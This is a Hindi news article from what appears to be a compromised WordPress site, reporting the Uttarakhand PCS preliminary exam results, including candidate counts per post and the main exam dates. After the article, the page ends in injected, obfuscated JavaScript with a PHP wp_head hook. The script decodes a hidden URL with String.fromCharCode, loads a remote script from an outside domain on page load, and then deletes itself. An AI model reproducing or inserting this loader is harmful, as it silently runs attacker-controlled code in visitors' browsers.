Saturday, July 27, 2024
spot_img

देहरादून– उत्तराखंड लोक सेवा आयोग ने यूके पीसीएस प्री-परीक्षा के परिणाम किए घोषित, इतने अभ्यर्थी हुए चयनित

देहरादून। उत्तराखंड लोक सेवा आयोग द्वारा यूके पीसीएस प्री-परीक्षा के परिणाम आज गुरूवार को जारी कर दिए गए हैं।सभी चयनित अभ्यर्थी अब पीसीएस की मुख्य परीक्षा में शामिल हो सकेंगे। इस यूकेपीएससी प्री परीक्षा में कुल 3389 अभ्यर्थियों का चयन किया गया है।
उत्तराखंड सम्मिलित राज्य सिविल अधीनस्थ सेवा परीक्षा 2021 के परीक्षा परिणाम को घोषित कर दिया गया है। प्रारंभिक परीक्षा के आधार पर जिन अभ्यर्थियों का चयन किया गया है, वह अब मुख्य परीक्षा में शामिल हो सकेंगे।
बता दें की पीसीएस प्री के लिए 3 अप्रैल 2022 को परीक्षा संपन्न कराई गई थी। इसमें डिप्टी कलेक्टर, पुलिस उपाधीक्षक, वित्त अधिकारी, सहायक संभागीय परिवहन अधिकारी समेत कुल 14 पदों के लिए कुल 3389 अभ्यर्थियों का चयन किया गया है। जिसके तहत सहायक निदेशक कारखाना पद के लिए 60 अभ्यर्थी, सहायक गन्ना आयुक्त सहायक निदेशक कृषि एवं भूमि संरक्षण अधिकारी के लिए 60 अभ्यर्थी, सहायक श्रम आयुक्त के लिए 30 अभ्यर्थी, उपनिबंधक श्रेणी 2 के लिए 182 अभ्यर्थी, जिला पर्यटन विकास अधिकारी के 15 अभ्यर्थी, प्रचार अधिकारी के लिए 15 अभ्यर्थियों का चयन किया गया है।
उद्योग विकास अधिकारी के लिए 209 अभ्यर्थी, जिला सूचना अधिकारी के पद पर 156 अभ्यर्थी, सहायक निदेशक उद्यान के लिए 30 अभ्यर्थी, सहायक निदेशक रसायन के लिए 15 अभ्यर्थी, जिला परिवीक्षा अधिकारी के 76 अभ्यर्थी, उप शिक्षा अधिकारी के लिए 480 अभ्यर्थियों का चयन हुआ है.इस अलावा सहायक निदेशक मत्स्य के लिए 46 अभ्यर्थी, सहायक निदेशक संस्कृत शिक्षा के लिए 41 अभ्यर्थी, सहायक निदेशक सांख्यिकी के लिए 15 अभ्यर्थी, सहायक निदेशक कृषि विभाग के लिए 16 अभ्यर्थी, खाद्य प्रसंस्करण अधिकारी उद्यान के लिए 45 अभ्यर्थी, सहायक निदेशक कृषि विभाग के लिए 15 अभ्यर्थी, अधीक्षक राजकीय प्रमाणित संस्था समाज कल्याण के लिए 45 अभ्यर्थियों का चयन हुआ है। वहीं बाल विकास परियोजना अधिकारी के 360 अभ्यर्थी, संपादक पद पर 15 अभ्यर्थी, फीचर लेखक के लिए 15 अभ्यर्थियों का चयन किया गया है। प्री परीक्षा में चयनित सभी अभ्यर्थियों को 20 अगस्त से 24 अगस्त तक होने वाली मुख्य लिखित परीक्षा में शामिल होने का अवसर मिलेगा।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>